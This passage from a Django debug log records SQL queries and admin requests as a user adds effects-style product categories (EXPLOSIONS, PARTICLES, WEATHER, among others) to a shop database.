7, 13, 15, 29, 900822, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:15:29,917 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:15:29,930 utils 32196 139885061072640 (0.002) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'EXPLOSIONS' LIMIT 1; args=('EXPLOSIONS',) DEBUG 2019-12-07 13:15:29,935 utils 32196 139885061072640 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'EXPLOSIONS' AND "shop_category"."parent_id" IS NULL) ORDER BY "shop_category"."name" ASC, "shop_category"."tree_id" ASC LIMIT 1; args=('EXPLOSIONS',) DEBUG 2019-12-07 13:15:29,938 utils 32196 139885061072640 (0.001) UPDATE "shop_category" SET "tree_id" = ("shop_category"."tree_id" + 1) WHERE "shop_category"."tree_id" > 0; args=(1, 0) DEBUG 2019-12-07 13:15:29,942 utils 32196 139885061072640 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "slug", "lft", "rght", "tree_id", "level") VALUES ('EXPLOSIONS', NULL, 'categories/2019/12/07/collection6.png', 'EXPLOSIONS', 'explosions', 1, 2, 1, 0) RETURNING "shop_category"."id"; args=('EXPLOSIONS', None, 'categories/2019/12/07/collection6.png', 'EXPLOSIONS', 'explosions', 1, 2, 1, 0) DEBUG 2019-12-07 13:15:29,944 utils 32196 139885061072640 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-07T13:15:29.942738+00:00'::timestamptz, 6, 8, '6', 'EXPLOSIONS', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 7, 13, 15, 29, 942738, tzinfo=), 6, 8, '6', 'EXPLOSIONS', 1, '[{"added": {}}]') [07/Dec/2019 13:15:29] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-07 13:15:30,207 utils 32196 139885061072640 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:15:30.192809+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 15, 30, 192809, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:15:30,211 utils 32196 139885061072640 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:15:30,291 utils 32196 139885061072640 (0.003) DECLARE "_django_curs_139885061072640_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:15:30,346 utils 32196 139885061072640 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-21T13:15:30.343250+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 21, 13, 15, 30, 343250, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [07/Dec/2019 13:15:30] "GET /shop/category/add/ HTTP/1.0" 200 7112 DEBUG 2019-12-07 13:15:30,638 utils 32196 139885061072640 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:15:30.628270+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 15, 30, 628270, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:15:30,641 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [07/Dec/2019 13:15:30] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-07 13:15:53,752 utils 32196 139885061072640 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:15:53.742901+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 15, 53, 742901, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:15:53,755 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:15:53,765 utils 32196 139885061072640 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'PARTICLES' LIMIT 1; args=('PARTICLES',) DEBUG 2019-12-07 13:15:53,768 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'PARTICLES' AND "shop_category"."parent_id" IS NULL) ORDER BY "shop_category"."name" ASC, "shop_category"."tree_id" ASC LIMIT 1; args=('PARTICLES',) DEBUG 2019-12-07 13:15:53,771 utils 32196 139885061072640 (0.001) UPDATE "shop_category" SET "tree_id" = ("shop_category"."tree_id" + 1) WHERE "shop_category"."tree_id" > 3; args=(1, 3) DEBUG 2019-12-07 13:15:53,774 utils 32196 139885061072640 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "slug", "lft", "rght", "tree_id", "level") VALUES ('PARTICLES', NULL, 'categories/2019/12/07/collection7.png', 'PARTICLES', 'particles', 1, 2, 4, 0) RETURNING "shop_category"."id"; args=('PARTICLES', None, 'categories/2019/12/07/collection7.png', 'PARTICLES', 'particles', 1, 2, 4, 0) DEBUG 2019-12-07 13:15:53,776 utils 32196 139885061072640 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-07T13:15:53.775077+00:00'::timestamptz, 6, 8, '7', 'PARTICLES', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 7, 13, 15, 53, 775077, tzinfo=), 6, 8, '7', 'PARTICLES', 1, '[{"added": {}}]') [07/Dec/2019 13:15:53] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-07 13:15:54,035 utils 32196 139885061072640 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:15:54.024156+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 15, 54, 24156, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:15:54,038 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:15:54,094 utils 32196 139885061072640 (0.002) DECLARE "_django_curs_139885061072640_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:15:54,135 utils 32196 139885061072640 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-21T13:15:54.133140+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 21, 13, 15, 54, 133140, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [07/Dec/2019 13:15:54] "GET /shop/category/add/ HTTP/1.0" 200 7152 DEBUG 2019-12-07 13:15:54,432 utils 32196 139885061072640 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:15:54.422692+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 15, 54, 422692, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:15:54,434 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [07/Dec/2019 13:15:54] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-07 13:16:13,062 utils 32196 139885061072640 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:16:13.053296+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 16, 13, 53296, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:16:13,065 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:16:13,072 utils 32196 139885061072640 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'SQUIBS & BLOOD' LIMIT 1; args=('SQUIBS & BLOOD',) DEBUG 2019-12-07 13:16:13,076 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'SQUIBS & BLOOD' AND "shop_category"."parent_id" IS NULL) ORDER BY "shop_category"."name" ASC, "shop_category"."tree_id" ASC LIMIT 1; args=('SQUIBS & BLOOD',) DEBUG 2019-12-07 13:16:13,078 utils 32196 139885061072640 (0.001) UPDATE "shop_category" SET "tree_id" = ("shop_category"."tree_id" + 1) WHERE "shop_category"."tree_id" > 5; args=(1, 5) DEBUG 2019-12-07 13:16:13,081 utils 32196 139885061072640 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "slug", "lft", "rght", "tree_id", "level") VALUES ('SQUIBS & BLOOD', NULL, 'categories/2019/12/07/collection8.png', 'SQUIBS & BLOOD', 'squibs-blood', 1, 2, 6, 0) RETURNING "shop_category"."id"; args=('SQUIBS & BLOOD', None, 'categories/2019/12/07/collection8.png', 'SQUIBS & BLOOD', 'squibs-blood', 1, 2, 6, 0) DEBUG 2019-12-07 13:16:13,082 utils 32196 139885061072640 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-07T13:16:13.081699+00:00'::timestamptz, 6, 8, '8', 'SQUIBS & BLOOD', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 7, 13, 16, 13, 81699, tzinfo=), 6, 8, '8', 'SQUIBS & BLOOD', 1, '[{"added": {}}]') [07/Dec/2019 13:16:13] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-07 13:16:13,338 utils 32196 139885061072640 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:16:13.327628+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 16, 13, 327628, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:16:13,341 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:16:13,382 utils 32196 139885061072640 (0.002) DECLARE "_django_curs_139885061072640_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:16:13,423 utils 32196 139885061072640 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-21T13:16:13.421132+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 21, 13, 16, 13, 421132, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [07/Dec/2019 13:16:13] "GET /shop/category/add/ HTTP/1.0" 200 7211 DEBUG 2019-12-07 13:16:13,733 utils 32196 139885061072640 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:16:13.723999+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 16, 13, 723999, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:16:13,735 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [07/Dec/2019 13:16:13] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-07 13:16:31,536 utils 32196 139885061072640 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:16:31.521721+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 16, 31, 521721, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:16:31,540 utils 32196 139885061072640 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:16:31,552 utils 32196 139885061072640 (0.002) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'WEATHER' LIMIT 1; args=('WEATHER',) DEBUG 2019-12-07 13:16:31,557 utils 32196 139885061072640 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'WEATHER' AND "shop_category"."parent_id" IS NULL) ORDER BY "shop_category"."name" ASC, "shop_category"."tree_id" ASC LIMIT 1; args=('WEATHER',) DEBUG 2019-12-07 13:16:31,559 utils 32196 139885061072640 (0.001) SELECT MAX("shop_category"."tree_id") AS "tree_id__max" FROM "shop_category"; args=() DEBUG 2019-12-07 13:16:31,563 utils 32196 139885061072640 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "slug", "lft", "rght", "tree_id", "level") VALUES ('WEATHER', NULL, 'categories/2019/12/07/collection9.png', 'WEATHER', 'weather', 1, 2, 8, 0) RETURNING "shop_category"."id"; args=('WEATHER', None, 'categories/2019/12/07/collection9.png', 'WEATHER', 'weather', 1, 2, 8, 0) DEBUG 2019-12-07 13:16:31,566 utils 32196 139885061072640 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-07T13:16:31.564211+00:00'::timestamptz, 6, 8, '9', 'WEATHER', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 7, 13, 16, 31, 564211, tzinfo=), 6, 8, '9', 'WEATHER', 1, '[{"added": {}}]') [07/Dec/2019 13:16:31] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-07 13:16:31,821 utils 32196 139885061072640 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:16:31.812943+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 16, 31, 812943, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:16:31,824 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:16:31,866 utils 32196 139885061072640 (0.002) DECLARE "_django_curs_139885061072640_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:16:31,897 utils 32196 139885061072640 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-21T13:16:31.896288+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 21, 13, 16, 31, 896288, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [07/Dec/2019 13:16:31] "GET /shop/category/add/ HTTP/1.0" 200 7239 DEBUG 2019-12-07 13:16:32,192 utils 32196 139885061072640 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:16:32.183442+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 16, 32, 183442, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:16:32,195 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [07/Dec/2019 13:16:32] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-07 13:17:15,287 utils 32196 139885061072640 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:17:15.272982+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 17, 15, 272982, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:17:15,290 utils 32196 139885061072640 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:17:15,299 utils 32196 139885061072640 (0.002) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'BIRDS & INSECTS' LIMIT 1; args=('BIRDS & INSECTS',) DEBUG 2019-12-07 13:17:15,304 utils 32196 139885061072640 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'BIRDS & INSECTS' AND "shop_category"."parent_id" IS NULL) ORDER BY "shop_category"."name" ASC, "shop_category"."tree_id" ASC LIMIT 1; args=('BIRDS & INSECTS',) DEBUG 2019-12-07 13:17:15,307 utils 32196 139885061072640 (0.002) UPDATE "shop_category" SET "tree_id" = ("shop_category"."tree_id" + 1) WHERE "shop_category"."tree_id" > 0; args=(1, 0) DEBUG 2019-12-07 13:17:15,312 utils 32196 139885061072640 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "slug", "lft", "rght", "tree_id", "level") VALUES ('BIRDS & INSECTS', NULL, 'categories/2019/12/07/collection10.png', '', 'birds-insects', 1, 2, 1, 0) RETURNING "shop_category"."id"; args=('BIRDS & INSECTS', None, 'categories/2019/12/07/collection10.png', '', 'birds-insects', 1, 2, 1, 0) DEBUG 2019-12-07 13:17:15,315 utils 32196 139885061072640 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-07T13:17:15.313754+00:00'::timestamptz, 6, 8, '10', 'BIRDS & INSECTS', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 7, 13, 17, 15, 313754, tzinfo=), 6, 8, '10', 'BIRDS & INSECTS', 1, '[{"added": {}}]') [07/Dec/2019 13:17:15] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-07 13:17:15,578 utils 32196 139885061072640 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:17:15.565044+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 17, 15, 565044, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:17:15,581 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:17:15,640 utils 32196 139885061072640 (0.002) DECLARE "_django_curs_139885061072640_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", 